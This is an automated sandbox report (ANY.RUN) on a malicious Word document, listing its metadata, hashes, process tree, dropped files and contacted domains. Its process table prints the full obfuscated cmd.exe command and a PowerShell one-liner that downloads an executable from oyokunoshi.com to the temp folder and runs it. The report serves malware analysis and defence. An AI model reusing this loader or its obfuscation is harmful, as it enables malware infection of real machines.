File name: | a4d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a |
Full analysis: | https://app.any.run/tasks/b1a29a33-daa9-42c5-afb7-2dd78d9301d3 |
Verdict: | Malicious activity |
Analysis date: | November 15, 2018, 13:53:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Riley, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 07:59:00 2018, Last Saved Time/Date: Wed Nov 14 07:59:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | AA36B197A72E34B19D2EC9F3C3980724 |
SHA1: | 981FE7ACDF4B1C09B3378F5D620B4F1D6D7F12E2 |
SHA256: | A4D4434C649926CD69C836F3A0579BAF18F7D3C480A115E80138A876BB7ABA0A |
SSDEEP: | 1536:RXF5ocn1kp59gxBK85fBt+a9ScUq8pZe5gx89DpaxpV1w:xFO41k/W483apZe5gx89DpaxpV6 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:14 07:59:00 |
CreateDate: | 2018:11:14 07:59:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Riley |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\a4d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3644 | cmd /V:O/C"^s^et M^K^b^h=^{G^+^[^Ihrs^0VDcFRxB^g;5^]j^m^1^'En^P^Ya\k=vi^p^yN}d/z^w^S$^u^l ^o^,e@^b:^2T^OQ^?^-^.(t)^f&&^f^or %^i ^in (3^4,47,^41,^49,6,^7,5^,^49,4^5,^4^5^,4^6^,^43,^13,^4^5,2^8^,3^1,23^,^9^,4^2,^6^3^,^2^3,^17^,4^3,9^,4^2,63,31^,^23,^5,^61,^6^1^,34^,5^2,^3^9^,^39,^47,^35,^47^,^30,44,2^5^,^47,^7,^5,^3^3,5^9,^11^,47^,^2^1^,^3^9^,27^,^24^,1^3^,3^9,^3^4,^4^9^,45^,^33^,2^1,59,^34^,^5^,3^4^,^5^7^,^45,3^1^,^33,^6,33^,^1^6,^18^,^5^9,^41^,^4^7^,7^,^23,59^,42^,34^,^4^5,33^,61^,^6^0^,^2^3,^5^0,2^3^,62^,17^,4^3,^2^5,^45,^7^,^3^1^,6^0^,3^,^42^,^3^5^,7,61,4^9^,21^,^59^,4^,^55,59,26,2^8^,^6^1,5,^1^9^,^52,^5^2,^1^,^4^9^,61,^54,4^9,21^,3^4^,2^6,2^8,^61,^5,^60^,62^,^2,2^3^,29^,56^,^63,^4^0^,^5^9^,4^9,1^4^,49^,2^3,^6^2,1^7^,43^,12,4,21^,46^,3^1,3^6,^49^,4^1^,58,^5^5,5^1^,^20^,49^,11,^61^,4^6,58,^11^,4^7,21^,^4^6^,23^,21^,^7^,^1^4,^2^1^,^45^,53,5^9,^1^4,21,45,5,^6^1^,6^1^,3^4,^23,17,4^3^,1^0,^2^6^,4^2,^46^,^3^1,^4^6,^3^6^,^4^9^,41^,^5^8,5^5^,^5^1,2^0^,^49^,11,6^1,4^6^,^58,^11,47^,2^1^,^46,^23,^2^8^,3^8^,47^,38^,^5^1,5^9,^7,^6^1^,6^,^49,28,2^1^,23^,1^7^,6^3,^47,6,4^9,^28,1^1,^5^,6^0^,^4^3^,^4,5,^15,^46^,^33^,25^,^46,4^3,9^,^4^2,^6^3,^6^2^,^0^,^6^1^,6^,35^,^0^,^43,^12^,^4,^2^1,5^9^,47,^3^4,^49,2^5,^6^0,2^3,^1^,^2^4^,5^4^,2^3^,^48^,4^3,4,5,15^,48^,8^,6^2,1^7,^4^3,1^2,4^,^21,^59,^7,^49^,2^5^,3^8,^60,62,^17^,43,^10^,2^6,^4^2,5^9,^47,3^4^,^49,25,^60^,62,^17,^4^3^,10^,^2^6,^4^2^,5^9^,61^,^35,^3^4,^4^9^,4^6^,^3^1^,4^6^,^22,17,43^,10,26,^42^,59,4^1^,6^,^3^3,6^1^,49^,^6^0^,43,^12,^4,2^1,^5^9^,^6,^4^9^,^7^,^34,47,^25^,^7^,49,15,47,38,^3^5,6^2,^17^,^4^3^,1^0,^26,4^2,59^,7,^2^8^,3^2^,49^,^6^1,4^7,^63^,3^3^,^45,4^9^,6^0^,^4^3^,2^5,^4^5^,^7,^62^,1^7^,4^2^,^6^1^,2^8^,6^,6^1^,^5^8,2^6^,^6,47,1^1,^49,^7,^7,4^6,^43^,^25^,4^5,^7,^1^7,^5^1^,6,^4^9^,2^8,3^0,37^,1^1^,^28^,61,^1^1,5^,0,^3^7,^3^7,^46,^46,^46,4^6,^4^6^,46^,4^6,4^6,^46,46^,^4^6^,^4^6^,^4^6^,46^,^46,^46^,^46,^7^0)^do ^se^t Fh^I^0=!Fh^I^0!!M^K^b^h:~%^i,1!&&i^f %^i g^e^q 7^0 c^all %Fh^I^0:^~^-^405%" | 
C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3612 | powershell $Rla='VSf';$VSf='http://oyokunoshi.com/YER/pelim.php?l=irig5.wos'.Split('@');$nls=([System.IO.Path]::GetTempPath()+'\Qfz.exe');$FIm =New-Object -com 'msxml2.xmlhttp';$DPS = New-Object -com 'adodb.stream';foreach($IhB in $VSf){try{$FIm.open('GET',$IhB,0);$FIm.send();$DPS.open();$DPS.type = 1;$DPS.write($FIm.responseBody);$DPS.savetofile($nls);Start-Process $nls;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9621.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W6RIR20G4FOTGONZKYT6.temp | — | |
MD5:— | SHA256:— | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:50DDE0B352B6BD888D97EE3BC7019251 | SHA256:A06E78FCC5FD2E462A212087C57E5F46397B2FFD6954B802D5018C1F7629DDE0 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3550A7E0F3366D8A445FBFC5DD23A66 | SHA256:654A5EEFED30887B25796A5645264A82D786784F16D1CFDB40E9FA70C71EB91D | |||
3008 | WINWORD.EXE | C:\Users\admin\Desktop\~$d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a.doc | pgc | |
MD5:EBB6FB938BF9C71D1A75204DBC2A3198 | SHA256:CA859F5433CC8DC60348A9AC26C3E8689EDA7D40EB88671731D2F5DD84622524 | |||
3612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3612 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da8be.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3008 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\a4d4434c649926cd69c836f3a0579baf18f7d3c480a115e80138a876bb7aba0a.doc.LNK | lnk | |
MD5:95CE4F9005052EAEB842AA718DF8F26E | SHA256:3ADEB55BB1EA6620961E830D8A40CDDF56FDF2DCE2BEA4B72250754F6C158ED9 |
Domain | IP | Reputation |
---|---|---|
oyokunoshi.com | | malicious |
dns.msftncsi.com | | shared |